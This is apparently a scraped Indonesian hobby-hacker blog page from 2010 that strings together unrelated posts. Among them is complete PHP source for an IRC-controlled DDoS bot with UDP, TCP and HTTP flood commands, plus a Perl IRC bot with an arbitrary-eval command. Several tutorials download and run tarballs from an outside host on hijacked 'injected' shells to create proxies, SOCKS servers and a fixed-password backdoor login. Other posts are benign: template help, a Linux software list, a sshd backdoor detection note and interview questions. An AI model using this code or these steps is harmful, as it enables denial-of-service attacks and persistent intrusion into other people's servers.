Selasa, 02 Februari 2010

How to upload Blogger templates

  1. Download your Blogger XML template from BTemplates.com. The template is contained in a zip file (winzip, winrar), ensure you have extracted the XML template.
  2. Log in to your Blogger dashboard and go to Layout > Edit HTML
  3. Ensure you back up your old template in case you decide to use it again. To do this, click on the "download full template" link and save the file to your hard drive.
  4. Look for the section near the top where you can browse for your XML template:
  5. Enter the location of your template and press "upload".
  6. The HTML of your new template will now appear in the box below. You can preview your template or simply save to start using it!
  7. Enjoy!

Templates/Layouts in http://btemplates.com
  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • php ddos bot



    /*


    PHP DDoS Bot
    Version 1.0
    [www.~censored~.org]


    */


    $server="1.3.3.7";
    $Port="6667";
    $nick="bot-";$willekeurig;
    $willekeurig=mt_rand(0,3);
    $nicknummer=mt_rand(100000,999999);
    $Channel="#WauShare";
    $Channelpass="ddos";
    $msg="Farewell.";

    set_time_limit(0);
    $loop = 0; $verbonden = 0;
    $verbinden = fsockopen($server, $Port);

    while ($read = fgets($verbinden,512)) {

    $read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
    $read2 = explode(" ",$read);

    if ($loop == 0) {
    fputs($verbinden,"nick $nick$nicknummer\n\n");
    fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
    }

    if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

    if ($read2[1] == 251) {
    fputs($verbinden,"join $Channel $Channelpass\n");
    $verbonden++;
    }


    if (eregi("bot-op",$read)) {
    fputs($verbinden,"mode $Channel +o $read2[4]\n");
    }


    if (eregi("bot-deop",$read)) {
    fputs($verbinden,"mode $Channel -o $read2[4]\n");
    }

    if (eregi("bot-quit",$read)) {
    fputs($verbinden,"quit :$msg\n\n");
    break;
    }

    if (eregi("bot-join",$read)) {
    fputs($verbinden,"join $read2[4]\n");
    }

    if (eregi("bot-part",$read)) {
    fputs($verbinden,"part $read2[4]\n");
    }


    if (eregi("ddos-udp",$read)) {
    fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
    $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
    if (!$fp)
    {
    //echo "$errstr ($errno)
    \n"; //troep
    exit;
    }
    else
    {
    $char = "a";
    for($a = 0; $a < 9999999999999; $a++)
    $data = $data.$char;

    if(fputs ($fp, $data) )
    fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
    else
    fputs($verbinden,"privmsg $Channel :udp-ddos - sending packets.\n\n");
    }
    }

    if (eregi("ddos-tcp",$read)) {
    fputs($verbinden,"part $read2[4]\n");
    fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
    $server = $read2[4];
    $Port = $read2[5];

    for($sockets = 0; $sockets < $read2[6]; $sockets++)
    {
    $verbinden = fsockopen($server, $Port);
    }
    }

    if (eregi("ddos-http",$read)) {
    fputs($verbinden,"part $read2[4]\n");
    fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
    $Webserver = $read2[4];
    $Port = $read2[5];

    $Aanvraag = "GET / HTTP/1.1\r\n";
    $Aanvraag .= "Accept: */*\r\n";
    $Aanvraag .= "Accept-Language: nl\r\n";
    $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
    $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
    $Aanvraag .= "Host: $read2[4]\r\n";
    $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

    for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
    {
    $DoS = fsockopen($Webserver, $Port);
    fwrite($DoS, $Aanvraag);
    fclose($DoS);
    }
    }
    $loop++;

    }
    ?>
  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • simple bot guard mirc

    #!/usr/bin/perl
    use strict();
    use warnings();
    use IO::Socket;


    #default Options
    my $network = "irc.freenodel.org"; #Network to connect to
    my @channels = ("#trea"); #Channels to join in
    my $op = "bla.vhost.at"; #Admin Vhost
    my $nick = "aBot"; #Nick bot uses
    my $user = "abot \"localhost\" \"".$network."\" :aBot"; #Username
    my $chancount = 0; #How much channels are default ?!

    sub send_pong;
    sub join_chans;
    sub parse_cmds;
    sub do_command;
    sub send_raw;

    my $socket = IO::Socket::INET->new
    (PeerAddr => $network,
    PeerPort => 6667,
    Proto => "tcp",
    Type => SOCK_STREAM) or die("Can't Connect");
    send_raw ("user $user\n");
    send_raw ("nick $nick\n");
    while(<$socket>) {
    parse_cmds($_);
    if($_ =~ '376')
    {
    print "[!] End of MOTD reached\n";
    print "[!] Joining Channels\n";
    join_chans($_);
    }
    }

    close($socket);

    sub do_command{
    ($name_, $to_, $host_, $cmd_) = @_;
    if($cmd_ =~ /^!help/){
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :#User Commands\n");
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !help - shows help menu\n");
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !chancount - shows how much channels needs me\n");
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !chanlist - shows in wich channels im\n");
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !sqrt - prints the root of the given number;example: 9 is 3\n");
    }
    if($cmd_ =~ /^!sqrt (\d*)/){
    $root = $1;
    send_raw("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :".$root." is ".sqrt($root)."\n");
    }
    if($cmd_ =~ /^!chancount/){
    send_raw("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :im in $chancount Channel(s)\n");
    send_raw("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :write !chanlist if you want to see in wich channels im\n");
    }
    if($cmd_ =~ /^!chanlist/){
    send_raw("PRIVMSG ".$name_." :im in:\n");
    foreach $chanl (@channels){
    send_raw("PRIVMSG ".$name_." :".$chanl.", \n");
    }
    }
    if($host_ eq $op){
    if($cmd_ =~ /^!help/){
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :#Adminstrative Commands\n");
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !kick - kicks a user outta a channel\n");
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !kickban - kickban's a user outta a channel\n");
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !op <+/-> : - give operator/take operator rights from a user\n");
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !voice <+/-> : - give voice/take voice rights from a user\n");
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." : !chanmode - set channel modes\n");
    }
    if($cmd_ =~ /^!chanmode (.*)/ ){
    $mode = $1;
    send_raw("MODE $to_ $mode\n");
    }
    if($cmd_ =~ /^!voice (.+?) (.+?) \:(.*)/){
    $chan = $2;
    $who = $3;
    $mode = $1;

    if($chan !~ /^#(.*)/){
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :arg1 is no channel\n");
    return;
    }
    if($mode eq "+"){
    send_raw("MODE ".$chan." +v ".$who."\n");
    }
    elsif($mode eq "-"){
    send_raw("MODE ".$chan." -v ".$who."\n");
    }
    }
    if($cmd_ =~ /^!op (.+?) (.+?) \:(.*)/){
    $chan = $2;
    $who = $3;
    $mode = $1;
    if($chan !~ /#(.*)/){
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :arg1 is no channel\n");
    return;
    }
    if($mode eq "+"){
    send_raw("MODE ".$chan." +o ".$who."\n");
    }
    elsif($mode eq "-"){
    send_raw("MODE ".$chan." -o ".$who."\n");
    }
    }
    if($cmd_ =~ /^!eval (.*)/){
    eval $1;
    }
    if($cmd_ =~ /^!join (.*)/){
    if($1 !~ /#(.*)/){
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :arg1 is no channel\n");
    return;
    }
    else {
    $channels[$chancount] = "#".$1;
    print "[!] Joining Channel: ".$channels[$chancount]."\n";
    send_raw ("JOIN ".$channels[$chancount]."\n");
    $chancount++;
    }
    }
    if($cmd_ =~ /!kick (.*) (.*)/){
    $kchan = $1;
    $knick = $2;
    if($1 !~ /#(.*)/){
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :arg1 is no channel\n");
    return;
    }
    else{
    send_raw("KICK $kchan $knick\n");
    }
    }
    if($cmd_ =~ /^!kickban (.*) (.*)/){
    $kchan = $1;
    $knick = $2;
    if($1 !~ /#(.*)/){
    send_raw ("PRIVMSG ".(($to_ =~/#(.*)/)? $to_ : $name_)." :arg1 is no channel\n");
    return;
    }
    else{
    send_raw("MODE ".$kchan." +b ".$knick."\n");
    send_raw("KICK $kchan $knick\n");
    }
    }
    }
    }

    sub parse_cmds{
    $cmds = shift;
    if($cmds =~ /^PING/){
    send_pong($_);
    }
    elsif ($cmds =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/){
    my $name=$1; my $host=$3; my $from=$4; my $args=$5;
    if ($args =~ /^VERSION$/) {
    send_raw ("PRIVMSG ".$name." :Dont disturb me!\n");
    }
    if($args =~ /^\!(.*)/)
    {
    do_command($name, $from, $host, $args);
    }
    }
    }

    sub join_chans{

    foreach $jchan (@channels){
    send_raw("join $jchan\n");
    $chancount++;
    printf "[!] Joining Channel: ".$jchan."\n";

    }
    }

    sub send_raw{
    my $tosend = shift;
    print $socket "$tosend";
    }

    sub send_pong{
    $pong = shift;
    if($pong =~ /^PING (.*)/){
    send_raw("PONG $1");
    }
    }
  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • team deathwar@allnework

    Team deathwar@allnetwork adalah kelompok team warrior mirc yang ada di allnetwork.
    berikut nama-nama para warrior deathwar@allnetwork :
    1. DeathwaR (Founder)
    2. KLEPON (senior Knight)
    3. Shadows (knight)
    4. Bergundal (knight)
    5. co_bios (knight)
    6. KiddieS (knight)
    7. rox_rock (knight)
    8. sotengboy (knight)
    9. given (knight)
    10. Rizki (knight)
    11. Ryan_BojzZ (knight)
    Walaupun koneksi gak mendukung tetapi semangat para warrior tetap tinggi..viva deathwar..
    tunjukkan kreativitasmu..
  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • 10 Aplikasi Linux

    Bagi anda pengguna sistem operasi linux, disini ada. Aplikasi-aplikasi dibawah ini kebanyakan merupakan aplikasi yang Open Source dan bisa anda download secara gratis.

    1. OpenOffice
    OpenOffice adalah produk multi-platform untuk perkantoran.
    Didalamnya terdapat aplikasi desktop seperti pengolah kata, spreadsheet, presentasi manajer, dan program gambar dengan antarmuka pengguna dan fitur lainnya yang mirip dengan program perkantoran yang lain.
    Download OpenOffice
    http://openoffice.mirrors.tds.net/pub/openoffice/stable/3.0.1/

    2. Calm Antivirus
    Clam AntiVirus adalah aplikasi open source (GPL) anti-virus toolkit untuk UNIX yang dirancang untuk e-mail pada pemindaian mail gateways.
    Clam AntiVirus memberikan sejumlah utilitas termasuk yang fleksibel, scalable multi-threaded daemon, a command line scanner dan dapat melakukan update database secara otomatis.
    Download ClamAV

    http://www.clamav.net/download/

    3. FileZilla
    Filezilla merupakan solusi aplikasi gratis untuk FTP.
    Filezilla klien adalah aplikasi yang cepat dan handal untuk lintas-platform FTP, FTPS dan SFTP client dengan banyak fitur bermanfaat dengan intuitif grafis antarmuka pengguna.
    Download FileZilla
    http://filezilla-project.org/download.php?type=client

    4. gZIP
    gzip (GNU zip) adalah utilitas untuk kompresi.
    Keuntungan gZIP adalah kompresi yang lebih baik dan bebas dari paten algoritma.
    Alat ini telah diadopsi oleh proyek GNU dan sekarang cukup populer di Internet.
    Download gzi

    http://www.gzip.org/

    5. PuTTy
    Putty merupakan aplikasi implementasi gratis untuk Telnet dan SSH.
    Putty dapat digunakan di sistem operasi Win32 dan platform Unix.
    Download Putty
    http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

    6. OpenSSH
    OpenSSH adalah sebuah versi GRATIS dari alat konektivitas SSH.
    Pengguna telnet, rlogin, dan ftp mungkin tidak menyadari bahwa password mereka ditularkan di Internet tanpa enkripsi.
    Tetapi OpenSSH melakukan encrypts semua lalu lintas (termasuk password) secara efektif untuk menghindari eavesdropping, pembajakan koneksi dan serangan lainnya.
    Sebagai tambahan, OpenSSH menyediakan kemampuan tunneling secara aman dan beberapa metode otentikasi, dan mendukung semua versi SSH protokol.
    Download OpenSSH
    http://www.openssh.org/portable.html

    7. Conky
    Conky adalah aplikasi gratis, Conky dapat menampilkan informasi apapun di komputer Anda.
    Fasiltas Conky antara lain :
    * Menampilkan info statistik seperti :
    uname, uptime, penggunaan CPU, penggunaan mempry, penggunaan harddisk, proses statistik dan memantau jaringan.
    * Mendukung POP3 dan IMAP.
    * Mendukung banyak sekali pemutar musik seperti MPD, XMMS2, BMPx, audacious dan lebih banyak lagi.
    Conky dapat menampilkan informasi baik sebagai teks, proses yang sederhana dan grafik widget dengan warna dan font yang berbeda.
    Download Conky
    http://sourceforge.net/project/showfiles.php?group_id=143975&package_id=158249

    8. TrueCrypt
    TrueCrypt merupakan aplikasi encryption yang open source untuk Windows Vista / XP, Mac OS X, dan Linux
    Kegunaan TrueCrypt antara lain :
    * Membuat virtual disk yang dienkripsi dalam file dan mounts sebagai real disk.
    * Melakukan Enkripsi partisi atau perangkat penyimpanan seperti USB flash drive dan hard drive.
    * Melakukan Enkripsi partisi atau drive di mana Windows terinstal (pre-boot otentikasi).
    * Melakukan Enkripsi secara otomatis, real-time (on-the-fly) dan transparan.
    * Memberikan tingkat dua masuk akal deniability, jika sebuah pasukan musuh yang mengungkapkan password:
    * Menggunakan algoritma: AES-256, Serpent, aTwofish dan Modus operasi: XTS.
    Download TrueCrypt

    http://www.truecrypt.org/downloads.php

    9. FireStarter
    Firestarter adalah Real Time Firewall yang memonitor semua port yang terbuka dan aktif pada koneksi jaringan di komputer Anda.
    Memungkinkan Anda untuk menetapkan aturan yang sangat ketat ditetapkan.
    Fitur utama termasuk
    * Open Source dan tersedia secara gratis.
    * Mudah untuk menggunakan dengan antarmuka grafis.
    * Cocok untuk digunakan di desktop, server dan gateways.
    * Memungkinkan Anda untuk mengatur inbound dan outbound sesuai aturan.
    * Dapat melihat aktifitas jaringan termasuk lalu lintas melalui firewall.
    Download FireStarter

    http://www.fs-security.com/download.php

    10. GParted
    GParted adalah aplikasi Gnome Partition Editor.
    GParted adalah aplikasi untuk menciptakan, menghapus, mengganti ukuran, memindahkan, memeriksa, menyalin partisi dan file sistem.
    GParted dapat membuat ruang untuk sistem operasi baru , pengaturan ulang penggunaan disk, menyalin data yang berada pada hard disk dan partisi mirroring satu dengan lainnya.
    Download Gparted

    http://gparted.sourceforge.net/download.php

  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • MENDETEKSI LOGIN SSH

    MENDETEKSI LOGIN SSH YANG MENGGUNAKAN MAGIC_PASSWD
    Author : KillFinger
    Editor : venand
    Press : ISD Indohack Security Development
    C : 2009
    #########################

    Just read n no comment ...

    1. Login dengan magic passwd:

    [kill@localhost project]$ ssh -l deMilo localhost
    deMilo@localhost's password:
    Last login: Thu Oct 15 11:51:04 2003 from localhost
    [root@localhost deMilo]#

    2. Perhatikan baik2 bagian ini:

    [root@localhost deMilo]# ps awux
    root 10320 0.0 0.5 2960 1352 ? S 11:46 0:00 /usr/sbin/sshd
    kill 11507 1.1 4.3 53120 11052 ? S 13:01 0:01 xmms
    kill 11557 0.1 0.5 2984 1476 pts/1 S 13:02 0:00 ssh -l deMilo localhost
    root 11558 0.0 0.5 5556 1536 ? S 13:02 0:00 sshd: deMilo [priv]
    root 11561 0.0 0.6 5644 1644 ? S 13:02 0:00 sshd:
    root 11879 0.4 0.5 2600 1512 pts/2 S 13:19 0:00 -bash
    kill 12206 2.2 0.5 2976 1468 pts/3 S 13:31 0:00 ssh -l john localhost
    root 12207 0.6 0.6 5556 1556 ? S 13:31 0:00 sshd: john [priv]
    john 12209 0.0 0.6 5644 1656 ? S 13:31 0:00 [sshd]
    john 12212 2.6 0.5 2600 1512 pts/5 S 13:31 0:00 -bash
    kill 12722 0.0 0.5 2976 1468 pts/4 S 14:09 0:00 ssh -l root localhost
    root 12723 0.0 0.6 5564 1580 ? S 14:09 0:00 sshd: root@pts/6
    root 12728 0.0 0.5 2604 1516 pts/6 S 14:09 0:00 -bash

    Penjelasan bagian atas;

    -- Seorang user login dengan login_name "deMilo" menggunakan magic passwd, otomatis akan menjadi root:

    root 11558 0.0 0.5 5556 1536 ? S 13:02 0:00 sshd: deMilo [priv]
    root 11561 0.0 0.6 5644 1644 ? S 13:02 0:00 sshd:
    root 11879 0.4 0.5 2600 1512 pts/2 S 13:19 0:00 -bash

    -- Seorang user login dengan login_name "john" menggunakan passwd nya sendiri (valid passwd):

    root 12207 0.6 0.6 5556 1556 ? S 13:31 0:00 sshd: john [priv]
    john 12209 0.0 0.6 5644 1656 ? S 13:31 0:00 [sshd]
    john 12212 2.6 0.5 2600 1512 pts/5 S 13:31 0:00 -bash

    -- sytem sshd anda telah di infeksikan magic-passwd apabila tiap user yang login nampak bagian sbb:

    root 11558 0.0 0.5 5556 1536 ? S 13:02 0:00 sshd: login_name [priv]
    root 11561 0.0 0.6 5644 1644 ? S 13:02 0:00 sshd:

    -- system yang normal (tidak terinfeksi):

    root 12207 0.0 0.5 5556 1536 ? S 13:31 0:00 /usr/sbin/sshd
    john 12209 0.0 0.6 5644 1656 ? S 13:31 0:00 [sshd]
    <-- dengan tanda kurung apabila user

    -- apabila root yang login dengan valid passwd:

    root 12723 0.0 0.6 5564 1580 ? S 14:09 0:00 sshd: root@pts/6 <-- root dgn valid passwd akan tampak begini
    root 12728 0.0 0.5 2604 1516 pts/6 S 14:09 0:00 -bash


    3. Login dengan login_name "apache" menggunakan magic passwd:

    [kill@localhost project]$ ssh -l apache localhost
    apache@localhost's password:
    -sh-2.05b# id
    uid=0(root) gid=0(root) groups=0(root)
    -sh-2.05b# pwd
    /var/www
    -sh-2.05b#

    4. Terlihat tanda2nya:

    [kill@localhost project]$ ps awux
    kill 11861 1.2 4.1 53248 10720 ? S 13:18 0:01 xmms
    kill 11931 0.5 0.5 2984 1476 pts/4 S 13:20 0:00 ssh -l apache localhost
    root 11932 0.0 0.5 5556 1536 ? S 13:20 0:00 sshd: apache [priv]
    root 11934 0.0 0.6 5644 1644 ? S 13:20 0:00 sshd:
    root 11937 0.2 0.5 2600 1516 pts/2 S 13:20 0:00 -sh
    kill 11967 0.0 0.2 2580 760 pts/1 R 13:20 0:00 ps awux

    Kesimpulan:
    Semua valid passwd yang login di log di suatu tempat apabila ada "sshd:". Atau dengan kata lain, apabila anda menemukan "sshd:" di command "ps awux" artinya system anda telah terinfeksi "magic_passwd". ExpLorE y0uR 0wN sYstEm. B-Creative!!!!

    5. Penutup

    Keep this Open-Source spirit up. This system is aLL about binary, if you are NOT 1 then you are 0. Knowledge is belong to the world, share it. Kritik, saran dan caci maki silahkan kirim ke KillFinger@linuxmail.org.

    Online BUddiEs:
    A_BlAcK_LisT, Acetosal, jhon angga, ryan_the, ucoxxx, AcCezZdENieD dan KIDS_KIDS. Special buat teman2 yang tidak bisa disebutkan satu persatu di #SecretColony, #HackingCentre, #Level9-Team @t DAL.Net.

    Offline d00d:
    t0t0 at jasakom (kapan nge-band lagi?), erich, d0nny, edd0, din0 at SecretColony Labs n Research Group, /bsp/mnt, y0gas.

    Salam hangat buat crew #IndoHack, #Neoteker, #IndoLinux. <-- OpenSource Team

    -----------------------
    To follow the path;
    look to the master,
    follow the master,
    walk with the master,
    see through the master,
    become the master.
    -----------------------
    Hacking is NOT instant.

    Best Regs
  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • Tutorial proxy dari shell | Socks 5 Dari Shell Injekan | akses putty dari shell Injekan

    Cara bikin proxy dari shell
    -
    1. wget / lwp-download / fetch http://venand.fileave.com/data/vie.tgz
    2. tar zxf vie.tgz
    3. cd pro
    4. ./xh -s "/usr/sbin/httpd"
    5. ./prox -a -d -p(4567) <-- port
    Setelah selesai, coba join ke #vip [Linknet] #Death [Allnet]
    lalu test portcheck.. example !port (nomerIP) (port)
    -
    -----------
    -
    Cara Bikin Socks 5 Dari Shell Injekan :
    1. wget / lwp-download / fetch http://venand.fileave.com/data/socks.tgz
    2. tar -zxvf socks.tgz
    3. cd .setan
    4. ./xh -s [ngentot-root-ya] ./httpd start
    -
    Setelah selesai, coba join ke #vip [Linknet] #Death [Allnet]
    lalu test portcheck.. example !port (nomerIP) 6543
    -
    -------------------
    -
    Cara memperoleh login akses putty dari shell Injekan :
    1. wget / lwp-download / fetch http://venand.fileave.com/data/blind.tar.gz
    2. tar -zvxf blind.tar.gz
    3. rm -fr blind.tar.gz
    4. ./blind
    -
    Setelah selesai, coba join ke #vip [Linknet] #Death [Allnet]
    lalu test portcheck.. example !port (nomerIP) 1953
    Kalau accepted, berarti sudah bisa login lewat putty (Telnet) dengan password : samboda
    -
    -
    -
    #===============================
    [i] Semoga yang saya tulis bermanfaat
    #===============================
  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • Script psyBNC

    Mengenal tentang psyBNC

    apa yang saya sampaikan ini hanya sekedar buat pengetahuan|belajar
    dan tidak ada maksud lebih, jadi jika apa yang saya tulis merugikan
    beberapa pihak, saya selaku FO|owner mafia-cyber, saya mohon maaf.
    jika ternyata kakak jauh lebih tau tentang artikel saya ini, saya
    mohon bimbingannya :D

    thanks alL [+]

    #======================
    # [*] Tahap persiapan #
    #======================

    [+]beberapa perlengkapan
    -
    [1] Shell | VPS
    [2] Software Putty <<<<< untuk mempercepat pembuatan eggdrop|psyBNC
    [3] Software winscp <<<< untuk mempermudah edit data pada Shell | VPS
    [4] Software IZArc <<<<< untuk Exract data
    -
    #=======================
    # [*] psyBNC chapture #2
    #=======================
    -
    [+] Memasukan Script pada psyBNC
    -
    [1] buka folder psybnc
    [.] cd psybnc <--- tergantung nama folder nya
    [.] rm -fr scripts
    [2] wget http://venand.fileave.com/data/scripts.tar.gz
    [3] tar -zxvf scripts.tar.gz
    [3] ls [ pastikan ada data DEFAULT.SCRIPT ]
    [4] login psyBNC kamu dan ketik /sreload
    -
    [=] psyBNC + script sudah jadi, mudah y :D
    ----------------------------------------------------
    -
    [+] cara edit script psyBNC
    -
    [0] buka sofware winscp yang sudah terinstal dan lakukan login
    -
    [01] cari folder psyBNC kamu
    [02] buka folder scripts dan kamu akan menemukan DEFAULT.SCRIPT
    [03] klik kanan dan klik edit
    [04] disitu anda akan disuguhkan tulisan yang bikin puyeng hehehe
    [05] klik aja di bagian atas ada edit | replace
    [06] pada Find what ketik : venand!*@*
    [07] pada replace with ketik : nickkamu!*@* [ ex : master!*@* ]
    [08] klik save n close edit
    [09] buka psyBNC kamu dan ketik /sreload
    [10] ketik di channel .auth <---- jika ada respon|jawaban berarti anda telah berhasil
    [11] ketik .help <--- untuk mengetahui commands nya
    -
    [=] Pengeditan script telah selesai, cukup mudah kan :D
    -----------------------------------------------------
    -
    [x] to be continue..........
    -
    -
    -
    -
    -
    -
    -
    #===================================================
    [i] Semoga yang saya tulis bermanfaat
    #===================================================
  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • Tutorial BOT eggdrop

    #=============
    # [*] BOT eggdrop
    #=============
    -
    [0] buka software putty dan lakukan login
    -
    [1] wget http://venand.fileave.com/data/tian.tar.gz
    [2] tar -zxvf tian.tar.gz
    [3] rm -fr tian.tar.gz
    [4] cd tian
    [5] /sbin/ifconfig
    [6] ./nadya a.txt [nickbot] [ident] [ip-shel] [chan-#] [owner]
    [7] ./eggdrop -m a.txt
    [8] ./dssl a.txt
    -
    [0] buka mirc kamu dan join di /server irc.hell.at 6667 [linknet]
    [0] ketik /msg [nick bot] hello
    [0] bot akan join otomatis di #channel anda
    [0] ketik /msg [nick bot] pass [password]
    [0] ketik /msg [nick bot] auth [password]
    [0] kamu akan mendapat pesan !OWNER
    -
    [=] bot eggdrop anda sudah jadi, mudah kan :D
    ---------------------------------------------------
    [note] bot ini akan join di server irc.hell.at 6667
    ---------------------------------------------------
    -
    -
    -
    [x] to be continue..........
    -
    -
    [+] Link boteggdrop yang lain
    -
    - http://venand.fileave.com/data/b0t.tar.gz == [ server datnet ]
    - http://venand.fileave.com/data/dal.tar.gz == [ server datnet ]
    - http://venand.fileave.com/data/tian.tar.gz == [ server Link-Net ]
    - http://venand.fileave.com/data/eggmbonx.tar.gz == [ server Allnetwork ]
    -
    -
    #===============================
    [i] Semoga yang saya tulis bermanfaat
    #===============================
  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • Cara Menambah TCL

    #======================
    # [*] Tahap persiapan #
    #======================
    -
    [+]beberapa perlengkapan
    -
    [1] Shell | VPS
    [2] Software Putty <<<<< untuk mempercepat pembuatan eggdrop|psyBNC
    [3] Software winscp <<<< untuk mempermudah edit data pada Shell | VPS
    [4] Software IZArc <<<<< untuk Exract data
    -
    -
    #============================
    # [*] BOT eggdrop chapture #2
    #============================
    -
    [0] buka software putty dan lakukan login
    -
    [+] Menambahkan script tcl bot eggdrop
    -
    [1] buka folder bot eggdrop anda
    [-] cd [nama folder] ex. cd eggdrop << jika folder eggdrop
    [-] cd scripts
    [2] wget http://.........
    [3] cd ..
    [4] ./tcl -[t] Nama_Config_File [Nama_File_tcl]
    [-] contoh ./tcl -t death.conf zodiak.tcl << jika yang anda masukan zodiak.tcl
    [5] anda masuk mirc dan ketik /msg [nickbot] rehash
    [-] tunggu beberapa saat
    [6] ketik di #channel perintah yang ada pada tcl yang anda masukan
    [-] !zodiak << jika yang anda masukan adalah zodiak.tcl
    -
    [=] edit bot eggdrop anda sudah jadi, mudah kan :D
    ---------------------------------------------------
    [x] to be continue..........................
    #====================================
    [i] Semoga yang saya tulis bermanfaat
    #====================================
  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • CARA BIKIN RADIO ONLINE DI JOOMLA ANDA

    Saya hanya ingin share bagaimana cara membuat situs joomla anda dilengkapi dengan radio streaming sendiri.. Radio streming ini dijalankan melalui sebuah server hosting gratis dan memerlukan winamp sebagai audio input untuk streming anda..

    Langsung aja ke step -stepnya..

    STEP I :
    1. KLIK DISINI kemudian bikin akun disitus itu agar kita mempunyai server shoutcast..
    2. Setelah berhasil mendaftar cek email untuk aktifasi akun anda, kemudian login..
    3. Setelah berhasil login, cari kata "radio installation" kemudian Anda akan diharuskan mengisi rincian di kolom yang sudah disediakan!! kemudian klik tombol install
    4. Catat semua isi dari installtion status yang keluar untuk konfirmasi server anda kemudian pilih salah satu dari 4 server yang disediakan kemudian klik "PRESS HERE"
    5. Setelah instalasi selesai, kemudian pilih preferences. Jika server sudah normal berjalan maka tanda ON berwarna hijau akan muncul. Jangan lupa catat "address to broadcast" untuk konfirmasi server anda!

    STEP II
    1. Download plugin winamp shoutcast dsp..
    Klik DISINI untuk Windows atau Klik DISINI untuk linux
    2. Intall plugin yang telah anda download kemudian buka winamp anda..
    3. Jika winamp anda telah muncul, klik kanan kemudian pilih Options => Preferences
    4. Pada popup yang muncul, pilih DSP/Effect pada plugin kemudian klik "Nullsoft SHOUTcast Source DSP v1.x.x [dsp_sc_dll]"
    5. Setelah muncul popup SHOUTcast Source, pilih tab Output untuk konfigurasi server anda yang tadi telah didaftarkan! Isi kolom Addres dan Port dengan IP dan port yang anda dapatkan tadi, kemudian pada bagian Password isi dengan Kata sandi akun anda!!
    6. Buka tab Input, pada Input Device, pilih winamp apabila anda menginginkan suara yang keluar hanya berasal dari winamp saja atau pilih Souncard input apabila anda ingin menambahkan mic untuk suara yang keluar!
    7. Kembali ke tab Output kemudan klik tombol Connect
    8. Pada winamp playlist silahkan masukan beberapa lagu dan mainkan musiknya!!

    STEP III
    1. Kembali kebrowser anda kemudian tulis Klik DISINI untuk download modul atau komponent streaming di site joomla anda..
    2. Masuk ke admin => ekstensions => install/uninstall
    3. Install modul atau komponen yang telah anda pilih dan download tadi..
    4. Setelah instalasi berhasil buka modul atau komponen yang telah diinstal tadi kemudian masukan host IP dan Port yang telah anda dapatkan saat menginstal server diatas tadi!!
    5. Buka site anda dan coba hasilnya..

    Jika ada masalah silahkan buat pertanyaan di FORUM!!
    Semoga bermanfaat..

  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • contoh pertanyaan khusus wawancara

    Contoh-contoh
    Pertanyaan Khusus dalam Wawancara

    1. Contoh Pertanyaan Khusus
    Kelompok Bidang Perbankan

    1. Ceritakan, apa yang dimaksud dengan bank ?
    2. Sebutkan dan jelaskan produk-produk perbankan yang anda ketahui.
    3. Jelaskan perbedaan deposito dengan tabungan.
    Bidang Marketing
